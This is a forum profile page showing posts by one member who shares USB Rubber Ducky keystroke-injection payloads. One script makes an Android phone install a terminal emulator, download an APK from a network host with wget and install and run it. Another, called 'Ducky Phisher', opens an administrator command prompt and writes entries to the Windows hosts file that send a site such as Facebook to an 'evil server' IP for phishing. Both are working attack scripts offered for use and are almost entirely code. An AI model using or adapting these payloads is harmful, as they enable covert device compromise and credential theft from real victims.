Jump to content

KoryusaiKun

Active Members
 View Profile  See their activity

  • Posts

    8

  • Joined

  • Last visited

 Content Type 

Posts posted by KoryusaiKun

    [Payload] Install Android Terminal Emulator wget apk, Install and run

    in Classic USB Rubber Ducky

    Posted · Edited by KoryusaiKun

    Hi Guys n' Girls,

    Here's my first payload in a while. What it dose is it opens the Play Store, Search's for terminal emulator, installs it form the store, opens it. Now wgets a file ( I used kos's AntiGuard.apk hosted locally, its the apk i had to hand :) ) then takes you to the install wizard, installs it, then runs it. All in about 20 Seconds. :) It could be quicker, this should work on most devices 4.0 and above i have only tryed it on my Samsung galaxy note II N7100 running android v4.1.1. You may just have to tweek a few things. Like the download URL and the file URI.

    Here is a demo as promised:

    This script was very annoying solely because of launching the android install wizard. If you use it please say thanks.


    REM ----------------------------------------------------
    REM Terminal emulator wget install and run V1.0
    REM Tested on Samsung Galaxy note II Android V4.1.1
    REM Koryusai-Kun
    REM ----------------------------------------------------
    DELAY 3000
    DELAY 100
    ESCAPE
    ESCAPE
    ESCAPE
    ESCAPE
    ESCAPE
    ESCAPE
    REM open google search
    CTRL z
    DELAY 1200
    REM open play store
    STRING play store
    DELAY 1000
    DOWN
    DOWN
    DOWN
    DOWN
    ENTER
    DELAY 2000
    REM Start Search for 'Terminal Emulator'
    STRING t
    DELAY 75
    STRING e
    DELAY 75
    STRING r
    DELAY 75
    STRING m
    DELAY 75
    STRING i
    DELAY 75
    STRING n
    DELAY 75
    STRING a
    DELAY 75
    STRING l emulator
    DELAY 500
    ENTER
    REM Select 'Terminal Emulator', Install and open
    DELAY 1000
    DOWN
    DOWN
    DELAY 50
    ENTER
    DELAY 300
    DOWN
    RIGHT
    ENTER
    DELAY 500
    DOWN
    DOWN
    ENTER
    DELAY 300
    ENTER
    DELAY 2000
    DOWN
    DOWN
    RIGHT
    ENTER
    DELAY 800
    REM Change Dir to /mnt/sdcard/
    STRING cd ..
    DELAY 50
    ENTER
    STRING cd ..
    DELAY 50
    ENTER
    STRING cd mnt
    DELAY 50
    ENTER
    STRING cd sdcard
    DELAY 50
    ENTER
    DELAY 50
    REM wget the file and open the android package install wizard
    STRING wget http://192.168.1.103/AntiGuard.apk; am start -a android.intent.action.MAIN -n com.android.packageinstaller/.PackageInstallerActivity -d file:////mnt//sdcard//AntiGuard.apk
    ENTER
    REM Go through the install then open the application
    DELAY 2500
    DOWN
    DELAY 200
    DOWN
    DELAY 200
    ENTER
    DELAY 1500
    DOWN
    DELAY 500
    DOWN
    DELAY 500
    DOWN
    DELAY 500
    ENTER[/CODE]

    [Payload] Ducky Phisher

    in Classic USB Rubber Ducky

    Posted

    You replace [WEBSITE_ADDRESS] with the website like www.facebook.com and the second with facebook.com then you put the evil server ip where [EVIL_SERVER_IP] is heres an example:

    ...
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "www.facebook.com" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 www.facebook.com>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "facebook.com" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 facebook.com>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
...

    [Payload] Ducky Phisher

    in Classic USB Rubber Ducky

    Posted

    Hi everyone,

    This is my first post and first script for the rubber duck. I have not yet tested this script as i am still waiting to recive it here in the UK. I got it from when i was talking to my friend about something he called desktop phishing it basicly replaces say facebooks or anyother sites ip with your chosen server's ip in the host file. Anyway heres the script:

    REM Author: .:Koryusai-Kun:.
REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows
REM Description: so when the user types into there web browser for example www.facebook.com it
REM Description: insted of going to the proper ip it gose to the one in the host file your evil one.
REM Description: you need to add the www. version and with out it as well.
REM ---[Start CMD as administrator]-----------------------
GUI
DELAY 50
STRING cmd
DELAY 150
MENU
DELAY 75
STRING a
Enter
DELAY 200
LEFT
ENTER
STRING cls
ENTER
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
DELAY 200
STRING exit
ENTER

×
×
  • Create New...